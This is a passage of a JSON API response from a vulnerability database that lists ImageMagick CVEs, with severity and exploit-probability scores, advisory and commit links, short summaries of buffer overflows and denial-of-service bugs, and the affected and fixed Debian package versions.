"generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/6f431d445f3ddd609c004a1dde617b0a73e60beb", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-30T18:09:57Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/6f431d445f3ddd609c004a1dde617b0a73e60beb" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2426285", "reference_id": "2426285", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2426285" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68618", "reference_id": "CVE-2025-68618", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68618" }, { "reference_url": "https://github.com/advisories/GHSA-p27m-hp98-6637", "reference_id": "GHSA-p27m-hp98-6637", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p27m-hp98-6637" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-p27m-hp98-6637", "reference_id": "GHSA-p27m-hp98-6637", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-30T18:09:57Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-p27m-hp98-6637" }, { "reference_url": "https://usn.ubuntu.com/8007-1/", "reference_id": "USN-8007-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8007-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-68618", "GHSA-p27m-hp98-6637" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2gw3-qfan-jygd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24037?format=api", "vulnerability_id": "VCID-2zje-ag2v-7kac", "summary": "ImageMagick has heap buffer overflow in WriteXWDImage due to CARD32 arithmetic overflow in bytes_per_line calculation\nA 32-bit unsigned integer overflow in the XWD (X Windows) encoder can cause an undersized heap buffer allocation. When writing a extremely large image an out of bounds heap write can occur.\n\n```\n=================================================================\n==741961==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x5020000083dc at pc 0x56553b4c4245 bp 0x7ffd9d20fef0 sp 0x7ffd9d20fee0\nWRITE of size 1 at 0x5020000083dc thread T0\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30937.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30937.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30937", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02773", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02792", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.0277", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02749", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02764", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03902", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03875", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03996", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03984", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03864", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03854", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.03919", "published_at": "2026-04-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30937" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-30937", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-30937" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qpg4-j99f-8xcg", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:34:45Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qpg4-j99f-8xcg" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30937", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30937" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445882", "reference_id": "2445882", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445882" }, { "reference_url": "https://github.com/advisories/GHSA-qpg4-j99f-8xcg", "reference_id": "GHSA-qpg4-j99f-8xcg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qpg4-j99f-8xcg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-30937", "GHSA-qpg4-j99f-8xcg" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2zje-ag2v-7kac" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/351735?format=api", "vulnerability_id": "VCID-381g-7gdr-qydg", "summary": "ImageMagick: Magick.NET: ImageMagick and Magick.NET: Denial of Service via malicious MSL file processing", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40312.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40312.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40312", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01596", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01529", "published_at": "2026-04-16T12:55:00Z" }, { "value": "4e-05", "scoring_system": "epss", "scoring_elements": "0.00199", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40312" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40312", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40312" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T19:06:40Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/2a06c7be3bba3326caf8b7a8d1fa2e0d4b88998d", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T19:06:40Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/2a06c7be3bba3326caf8b7a8d1fa2e0d4b88998d" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T19:06:40Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5xg3-585r-9jh5", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T19:06:40Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5xg3-585r-9jh5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40312", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40312" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458044", "reference_id": "2458044", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458044" }, { "reference_url": "https://github.com/advisories/GHSA-5xg3-585r-9jh5", "reference_id": "GHSA-5xg3-585r-9jh5", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5xg3-585r-9jh5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054646?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068084?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1" } ], "aliases": [ "CVE-2026-40312", "GHSA-5xg3-585r-9jh5" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-381g-7gdr-qydg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/351737?format=api", "vulnerability_id": "VCID-441f-z9bp-vbdu", "summary": "ImageMagick: Magick.NET: ImageMagick: Denial of service via heap out-of-bounds write in JP2 encoder", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40310.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40310.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40310", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01596", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01529", "published_at": "2026-04-16T12:55:00Z" }, { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00287", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40310" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40310", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40310" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:33:34Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/3d653bea2df085c728a1c8f775808e1e9249dff9", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:33:34Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/3d653bea2df085c728a1c8f775808e1e9249dff9" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:33:34Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pwg5-6jfc-crvh", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:33:34Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pwg5-6jfc-crvh" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40310", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40310" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134627", "reference_id": "1134627", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134627" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458047", "reference_id": "2458047", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458047" }, { "reference_url": "https://github.com/advisories/GHSA-pwg5-6jfc-crvh", "reference_id": "GHSA-pwg5-6jfc-crvh", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pwg5-6jfc-crvh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054646?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068084?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1" } ], "aliases": [ "CVE-2026-40310", "GHSA-pwg5-6jfc-crvh" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-441f-z9bp-vbdu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/24252?format=api", "vulnerability_id": "VCID-54da-fzyt-4ud2", "summary": "ImageMagick has stack write buffer overflow in MNG encoder\nA stack buffer overflow vulnerability exists in the MNG encoder. There is a bounds checks missing that could corrupting the stack with attacker-controlled data.\n\n```\n==2265506==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffec4971310 at pc 0x55e671b8a072 bp 0x7ffec4970f70 sp 0x7ffec4970f68\nWRITE of size 1 at 0x7ffec4971310 thread T0\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28690.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28690.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28690", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02346", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02324", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02321", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02326", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02316", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02937", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02856", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02837", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02832", "published_at": 